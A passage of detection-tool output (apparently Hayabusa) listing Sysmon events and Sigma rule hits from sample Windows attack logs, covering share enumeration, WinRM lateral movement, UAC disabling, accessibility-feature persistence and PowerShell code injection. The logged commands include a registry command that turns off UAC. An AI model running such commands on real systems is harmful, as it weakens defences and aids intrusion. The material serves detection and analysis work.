(alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx 2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx 2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx 2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx 2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx 2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx 2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx 2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,../hayabusa-rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx 2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,../hayabusa-rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 